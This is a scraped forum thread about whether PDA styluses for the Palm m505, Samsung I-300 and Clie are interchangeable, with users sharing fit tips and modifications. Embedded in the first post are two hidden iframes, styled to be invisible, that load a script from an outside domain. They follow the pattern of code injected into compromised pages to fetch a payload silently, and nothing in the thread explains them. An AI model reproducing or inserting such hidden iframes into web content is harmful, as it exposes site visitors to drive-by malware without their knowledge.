+ Reply to Thread

I-300 Stylus - Same as M505?

Does anyone know for a fact if the M505 stylus is interchangeable with the one from the I-300? I'd like to replace the I-300 stylus with a combination pen. Can I use one designed to fit the M-505?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

someone else had mentioned that the i300's stylus is slightly smaller - in this case the guy had made the hole for the stylus bigger so that he could fit the other stylus.
    -mark

Thumbs up try the Clie

I've purchased the pentopia chameleon thing for the Clie, and besides not fully filling the area on top of the stylus barrell, it works pretty smoothly. It does fit a tiny bit tight, but not near as tight as the m505 one. It also has a bit larger tab on the top, so I think it's easier to remove. I'd suggest using the finger nail file portion of a nail clipper, version 1.2 from LaCrosse USA to round out the hole a tiny bit, or you can just enjoy the secure fit of the barrell as is.
    every time the wheel goes round, your bound to cover a bit more ground.

Originally posted by dionysus
    someone else had mentioned that the i300's stylus is slightly smaller - in this case the guy had made the hole for the stylus bigger so that he could fit the other stylus.
    -mark
    Yeah, that was me, but with a Palm V stylus. Someone else replied to the same post and said his m505 stylus fit without mods... I'd either reply to that guy or go to CompUSA/ etc. and try it out!

I posted this in another thread but it may bear repeating. I have an m505 with a Landware floating point stylus. I was able to remove the top of the Samsung stylus with the reset pin and place it in the top of the 505 stylus. It fits perfectly. The stylus itself is a little smaller in diameter and slides in and out very easily but it is the cap from the Samsung that keeps it in place.

Originally posted by stevebtn
    I posted this in another thread but it may bear repeating. I have an m505 with a Landware floating point stylus. I was able to remove the top of the Samsung stylus with the reset pin and place it in the top of the 505 stylus. It fits perfectly. The stylus itself is a little smaller in diameter and slides in and out very easily but it is the cap from the Samsung that keeps it in place.
    Steve,

I followed your advice, and received the stylus the nest day!

I love the floating stylus, and much more quiet for lying in bed at night and playing Pyramid Solitaire (the most addicting game I have ever played).

Craig
    I thought grafitti was illegal?

M505 Pen Stylus Combo

There's a few combination stylii out there for the 505 that look like they may fit but I was wondering if any will accept the original cap such as the landware one does. I'd prefer to be able to use the original, since as Steve says "it is the cap from the Samsung that keeps it in place. "

Anyone had a chance to try any of the combo units out?